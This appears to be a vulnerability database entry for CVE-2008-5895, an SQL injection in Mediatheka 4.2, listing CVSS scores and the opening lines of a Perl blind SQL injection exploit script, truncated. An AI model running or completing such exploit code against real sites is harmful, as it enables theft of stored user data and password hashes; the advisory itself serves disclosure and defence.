7.5
CVSSv2

CVE-2008-5895

Published: 12/01/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in connection.php in Mediatheka 4.2 and previous versions allows remote malicious users to execute arbitrary SQL commands via the user parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

mediatheka mediatheka 4.2

Exploits

#!/usr/bin/perl -w # Mediatheka <= 42 Remote Blind SQL Injection Exploit # by athos - staker[at]hotmail[dot]it use strict; use LWP::UserAgent; my ($stop,$start,$hash); my $domain = shift; my $userid = shift or &usage; my @chars = (4857, 97102); my $substr = 1; my $http = new LWP::UserAgent; &usage unless $domain =~ /^http:\/ ...